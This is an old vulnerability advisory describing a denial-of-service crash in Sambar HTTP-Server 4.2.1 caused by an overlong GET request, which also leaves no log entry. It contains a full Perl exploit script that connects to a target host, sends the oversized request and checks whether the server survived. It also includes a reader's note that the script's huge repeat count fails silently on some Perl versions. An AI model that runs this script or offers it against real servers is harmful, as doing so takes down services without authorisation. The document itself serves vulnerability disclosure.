Vulnerability sambar Affected Win32 Description Dennis Conrad found following. While testing the security of the Sambar HTTP-Server he found it vulnerable to a simple DOS attack. Sending a "GET XXXX(...a lot of Xs..)XXXX HTTP/1.0" crashes the Server. It will die WITHOUT logging the attack. His testing-environment: Sambar 4.2.1 MS IE 5.0 (de) Windows 95 C (de) Sample exploit code follows: #!/usr/bin/perl ######### # Sample DOS against the Sambar HTTP-Server # This was tested against Sambar 4.2.1 running on Windows95 C # This attack will NOT be logged! Only use it to determine if # your Server is vulnerable! # # Dennis Conrad (dennis@linuxstart.com) # use IO::Socket; print "+++++++++\n"; print "+ Simple DOS-attack against the Sambar HTTP-Server (tested 4.2.1)\n"; print "+ Found on the 3rd of October 1999 by dennis\@linuxstart.com\n\n"; if ($#ARGV != 0) { die "+ Please give the host address as argument\n" } opensocket ("\n"); print $remote "GET " . "X" x 99999999999999999999 . " HTTP/1.0\n\n"; close $remote; opensocket ("\n+ The server seemed to be vulnerable to this attack\n"); close $remote; die "+ The server does not seem to be vulnerable to this attack\n"; sub opensocket { $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $ARGV[0], PeerPort => "http(80)", ) || die "+ Can't open http-port on $ARGV[0]$_[0]"; $remote->autoflush(1) } Using that many 9s on my version of Perl fails silently. The above seems equivalent to: print $remote "GET HTTP/1.0\n\n"; steve@grok:/home/steve% perl -e 'print "X"x99999999999999999999;' steve@grok:/home/steve% perl -e 'print "X"x99999999999999999999 || die;' Died at -e line 1. steve@grok:/home/steve% perl -v This is perl, version 5.005_03 built for i386-freebsd [etc.] Solution Nothing yet.